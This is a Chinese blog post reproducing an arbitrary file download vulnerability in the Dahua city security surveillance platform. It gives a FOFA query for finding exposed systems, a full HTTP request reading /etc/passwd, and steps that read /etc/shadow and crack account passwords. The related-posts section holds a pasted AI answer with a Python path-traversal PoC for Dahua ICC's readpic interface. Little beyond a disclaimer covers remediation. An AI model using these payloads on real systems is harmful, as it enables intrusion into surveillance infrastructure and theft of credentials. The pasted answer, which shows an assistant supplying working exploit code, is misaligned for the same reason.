漏洞复现--大华城市安防系统平台任意文件下载

最新推荐文章于 2024-11-24 15:25:57 发布
最新推荐文章于 2024-11-24 15:25:57 发布
阅读量347 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 python

目录

免责声明:

一:漏洞描述

二:漏洞影响版本

三:网络空间测绘查询

四:漏洞复现

五:漏洞利用

六:修复方案

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。

二:漏洞影响版本

-大华城市安防系统

三:网络空间测绘查询

fofa语句:

app="dahua-DSS"

image.png

四:漏洞复现

POC:

GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

image.png


 

image.png


成功读取etc/passwd

五:漏洞利用

用户密码存放在etc/shadow下,读取etc/shadow
 

image.png


拿去cmd解密
guest
 

image.png


ftp
 

image.png


运气好的话root密码可以破解。
点到为止,拿到密码后可以干什么懂得都懂,这里也是不演示了

六:修复方案

自行查询厂商发布补丁

大华城市安防监控系统平台attachment_downloadByUrlAtt.action存在任意文件读取漏洞 附POC软件
nnn2188185的博客
02-02 203
大华城市安防监控系统平台attachment_downloadByUrlAtt.action存在任意文件读取漏洞 附POC软件
漏洞复现大华-智慧园区综合管理平台-wpms-video-任意文件上传
知黑而守白
02-01 207
大华智慧园区综合管理平台是一款基于云计算、大数据、人工智能等技术的智慧园区管理解决方案,可为园区提供运营管理、综合安防、便捷通行、协同办公等多项功能,帮助园区实现安全等级提升、工作效率提升、管理成本下降。大华智慧园区综合管理平台允许攻击者通过 video 接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
大华智慧园区综合管理平台任意文件下载
Bnessy
10-29 193
【代码】大华智慧园区综合管理平台任意文件下载
大华城市安防系统平台任意文件下载漏洞
CommputerMac的博客
10-06 987
大华城市安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式,包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外,该平台还支持多种报警方式,包括移动侦测、区域入侵、越线报警、人员聚集等。filePath=file:///etc/passwd,可下载文件。大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。关注微信公众号 网络安全透视镜 回复 20231007 获取检测利用脚本。
任意文件下载漏洞原理以及修复方法
it知识分享 free for nothing..
12-25 1758
任意文件下载漏洞原理以及修复方法
大华城市安防监控系统平台 任意文件下载漏洞复现(QVD-2023-20736)
0xSec
02-01 590
大华城市安防监控系统平台 attachment_downloadByUrlAtt.action接口存在任意文件下载漏洞,未经身份验证的攻击者 可以获取系统内部敏感文件信息,使系统处于极不安全的状态。
漏洞复现大华DSS城市安防监控平台任意文件读取漏洞
晚风不及你
03-05 1105
大华DSS数字监控系统平台存在任意文件读取漏洞,攻击者可以通过此漏洞获取服务器上的任意文件,造成敏感信息泄露。
大华智能物联综合管理平台任意文件读取
weixin_43567873的博客
03-07 606
大华智能物联综合管理平台任意文件读取(QVD-2023-45063)
漏洞复现大华城市安防监控系统平台 任意文件下载漏洞
KKleeeaa的博客
02-01 836
任意文件下载
漏洞复现大华DSS视频管理系统信息泄露漏洞
晚风不及你
02-20 2799
大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统,除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外,更注重用户使用的便利性。
大华城市安防监控系统平台管理存在任意文件下载漏洞
剁椒鱼头没剁椒的博客
02-14 3017
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。刷新登录页面进行抓包,然后在数据包中添加POC。大华城市安防监控系统平台管理。
大华智慧园区综合管理平台存在任意文件上传漏洞
nnn2188185的博客
07-18 1022
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上。
大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现
holyxp的博客
12-18 3411
大华 DSs 数字监控系统是大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华 DSS存在SQL注入漏洞,攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如,管理员后台密码、站点的用户人人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限poc验证是否存在漏洞如果你想查询用户名和密码。
漏洞复现大华-城市安防监控系统平台管理-SQL注入-itcBulletin
知黑而守白
06-19 312
DSS大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。可将视频监控、卡口拍照、 区间测速 、电子地图、违章查询系统等诸多主流应用整合在一起,实现更加智能、便捷的分级查询服务。大华DSS itcBulletin 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
复现大华 DSS 数字监控系统 任意文件读取漏洞_38
fushuang333的博客
02-03 1718
复现大华 DSS 数字监控系统 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
Fastadmin框架短视频知识付费系统存在任意文件读取漏洞
缘梦未来的博客
11-24 317
FastAdmin框架短视频系统/视频知识付费源码/附带小说系统系统视频支持包月、单独购买、观影卷等功能源码附带小说系统源码需要配置高服务器和VDN加速
大华DSS user_toLoginPage.action命令执行漏洞
Keepb1ue的博客
07-07 769
大华DSS 数字监控系统是大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华存在前台命令执行漏洞,攻击者可以通过此漏洞获取服务器权限。
漏洞复现大华-DSS-attachment_downloadByUrlAtt-文件读取
知黑而守白
02-01 187
DSS大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。可将视频监控、卡口拍照、 区间测速 、电子地图、违章查询系统等诸多主流应用整合在一起,实现更加智能、便捷的分级查询服务。大华DSS attachment_downloadByUrlAtt 接口存在一个任意文件读取漏洞,攻击者可以通过构造精心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。通过利用此漏洞,攻击者可能获得系统内的敏感信息,导致潜在的信息泄露风险。
大华 DSS 城市安防数字监控系统 SQL 注入漏洞
Keepb1ue的博客
12-21 1726
大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,可通过注入漏洞获取数据库敏感信息。
大华智能物联ICC综合管理平台readpic任意文件读取漏洞利用过程
最新发布
03-24
<think>好的,我现在需要帮助用户了解大华智能物联ICC综合管理平台readpic接口的任意文件读取漏洞的利用方法,包括具体的POC。首先,我得回顾用户提供的三个引用内容,看看里面有没有相关的技术细节。 根据引用1,漏洞存在文件读取问题,攻击者可以获取敏感信息。引用2提到漏洞位于readpic接口,未经身份验证的攻击者可以利用。引用3则指出该平台的技术架构,漏洞会导致敏感信息泄露,并提到了POC的存在。所以,我需要整合这些信息,给出一个清晰的利用步骤。 接下来,我应该先描述漏洞的基本情况,比如漏洞编号QVD-2023-45063,影响版本,漏洞位置在readpic接口。然后说明漏洞成因,可能是未对用户输入做严格过滤,导致路径遍历。 然后,利用过程需要分步骤:环境搭建、漏洞验证、构造请求、利用路径遍历读取文件。在构造请求时,需要明确请求方法(GET)、接口路径,以及如何利用参数进行目录穿越,比如../../../../etc/passwd。同时要提到不同系统的文件路径差异,比如Windows和Linux。 关于POC部分,用户可能需要具体的代码示例,比如用Python的requests库发送GET请求,并处理响应。这时候需要确保代码正确,并提醒用户注意测试环境的安全性,避免违法操作。 最后,生成相关问题,覆盖漏洞修复、影响版本、类似漏洞原理、企业防范措施等,这样用户如果有进一步的问题,可以继续探索。 需要检查是否所有技术细节都准确,比如漏洞接口的路径是否正确,参数是否正确,以及是否引用了正确的来源。同时,确保回答结构清晰,分步骤说明,并附上代码示例,符合用户的要求。</think>### 大华ICC readpic接口任意文件读取漏洞利用方法 #### 漏洞背景 大华ICC智能物联综合管理平台`readpic`接口因未对文件路径参数进行严格过滤,攻击者可通过构造特殊路径实现任意文件读取,导致敏感信息泄露(如系统配置文件、密码文件等)[^2][^3]。漏洞编号为**QVD-2023-45063**。 --- #### 漏洞利用步骤(POC) **1. 环境搭建** - 受影响版本:大华ICC智能物联综合管理平台特定版本(需参考官方公告) - 复现环境:使用Docker搭建测试平台或存在漏洞的真实设备(需授权)[^3]。 **2. 漏洞验证** 向目标系统发送以下HTTP请求,尝试读取`/etc/passwd`(Linux系统)或`C:\Windows\win.ini`(Windows系统): ```http GET /emap/device/point_add/img/img?file=../../../../../../../../etc/passwd HTTP/1.1 Host: [目标IP]:[端口] User-Agent: Mozilla/5.0 Connection: close ``` **3. 关键参数说明** - **接口路径**:`/emap/device/point_add/img/img` - **参数`file`**:通过路径遍历(`../../`)跳转至目标文件路径。 **4. 利用过程** - **构造恶意请求**: 使用`curl`或Python脚本发送请求: ```python import requests url = "http://目标IP:端口/emap/device/point_add/img/img" params = { "file": "../../../../../../../../etc/passwd" } response = requests.get(url, params=params) print(response.text) ``` - **结果判断**: 若返回`200 OK`且包含系统文件内容,则漏洞存在。 --- #### 防御建议 1. 升级至官方修复版本。 2. 对`file`参数进行规范化检查,过滤`../`等特殊字符。 3. 限制文件访问权限至必要目录[^1]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值